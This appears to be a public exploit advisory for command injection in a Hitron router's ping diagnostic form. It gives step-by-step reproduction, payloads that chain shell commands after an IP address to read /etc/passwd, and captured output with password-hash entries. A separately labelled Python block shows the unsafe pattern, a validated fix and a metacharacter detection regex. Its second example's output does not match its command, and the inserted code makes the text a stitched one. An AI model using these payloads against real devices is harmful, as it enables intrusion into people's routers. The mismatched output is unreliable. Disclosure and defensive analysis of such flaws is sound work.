# Exploit title: Hitron Router (CGN3ACSMR) - Remote Code Execution
# Author: Dolev Farhi (dolevf at protonmail.ch)
# Date: 29-10-2015
# Vendor homepage: http://www.hitrontech.com/en/index.php
# Software version: 4.5.8.16
# Hardware version: 1A

# Details:

Hitron routers provide an interface to test connectivity (ping, tracert) via the graphical user interface of the router (Management UI).

This interface is vulnerable to command injection: appending && and a command after the IP address in the destination field causes that command to be executed as well.
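The class of bug described above is a diagnostic form whose destination field is pasted into a shell command line. The following is an added example, not code from the advisory or from Hitron's firmware: it shows that unsafe pattern next to a hardened handler that accepts only an IP literal and builds an argv list so no shell ever parses the field, plus a small detection helper for flagging such requests in logs. The function names, the /bin/ping path, the IP-only policy and the sample inputs are assumptions made for the illustration.

```python
"""Added example (not the advisory's or the vendor's code): command injection
through a "ping" diagnostic field, and the hardened alternative.

Assumptions for this illustration: the handler only needs to accept IP
literals, ping lives at /bin/ping, and four probes are sent per request.
"""
import ipaddress
import re
from typing import List, Optional

# Constructed sample inputs: the benign address and the injection payload
# shape from the advisory (an extra command joined with &&).
BENIGN_DEST = "8.8.8.8"
INJECTED_DEST = "8.8.8.8 && cat /etc/passwd"

# Characters that let a shell chain, redirect or substitute commands.
SHELL_METACHARS = re.compile(r"[;&|`$(){}<>\n\\'\"]")


def build_ping_unsafe(destination: str) -> str:
    """The vulnerable pattern: the user-supplied field is interpolated into
    a single string that would be handed to a shell. Returned, not executed,
    so the resulting command line can be inspected."""
    return f"ping -c 4 {destination}"


def validate_destination(destination: str) -> Optional[str]:
    """Allow-list validation: accept only a syntactically valid IPv4/IPv6
    literal and return it normalised; anything else yields None."""
    try:
        return str(ipaddress.ip_address(destination.strip()))
    except ValueError:
        return None


def build_ping_safe(destination: str) -> List[str]:
    """Hardened pattern: validate first, then build an argv list meant for
    subprocess.run(argv, shell=False). The destination is one argument and
    is never parsed by a shell, so && has no special meaning."""
    addr = validate_destination(destination)
    if addr is None:
        raise ValueError("destination must be a single IP address")
    return ["/bin/ping", "-c", "4", addr]


def looks_like_injection(destination: str) -> bool:
    """Detection helper for request logs or a front-end filter: flag a
    diagnostic request whose destination carries shell metacharacters."""
    return bool(SHELL_METACHARS.search(destination))


if __name__ == "__main__":
    print("unsafe command line:", build_ping_unsafe(INJECTED_DEST))
    print("safe argv          :", build_ping_safe(BENIGN_DEST))
    for dest in (BENIGN_DEST, INJECTED_DEST):
        print(f"{dest!r}: suspicious={looks_like_injection(dest)}")
    try:
        build_ping_safe(INJECTED_DEST)
    except ValueError as err:
        print("rejected:", err)
```

If the form must also accept hostnames, keep the same structure and replace the ipaddress check with a strict allow-list (for example letters, digits, hyphens and dots, bounded in length); the important property is that the field becomes a single argv element and is never concatenated into a shell string. The detection helper is intentionally noisier than the validator: logging every rejected request with metacharacters gives an operator a signal that the diagnostic page is being probed.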

# Steps to reproduce:

1. Navigate to the dashboard
2. Navigate to the admin tab
3. Type an IP address in the Destination form
4. Append any command you want after the IP

Example one:

8.8.8.8 && cat /etc/passwd

Result:

root:$1$27272727:0:0::/:/bin/false
nobody:$1$27272727:65535:65535::/:/bin/false
rogcesadmin:filtered/:100:100::/:/usr/sbin/cli
=============Complete==============

Example two:

8.8.8.8 && ip a

Result:

PID USER VSZ STAT COMMAND
1 root 1268 S init
2 root 0 SW [kthreadd]
3 root 0 SW [ksoftirqd/0]
5 root 0 SW [kworker/u:0]
6 root 0 SW< [khelper]
7 root 0 SW [irq/74-hw_mutex]
8 root 0 SW [sync_supers]
9 root 0 SW [bdi-default]
10 root 0 SW< [kblockd]
11 root 0 SW< [gPunitWorkqueue]
12 root 0 SW [irq/79-punit_in]
13 root 0 SW [kswapd0]
14 root 0 SW< [crypto]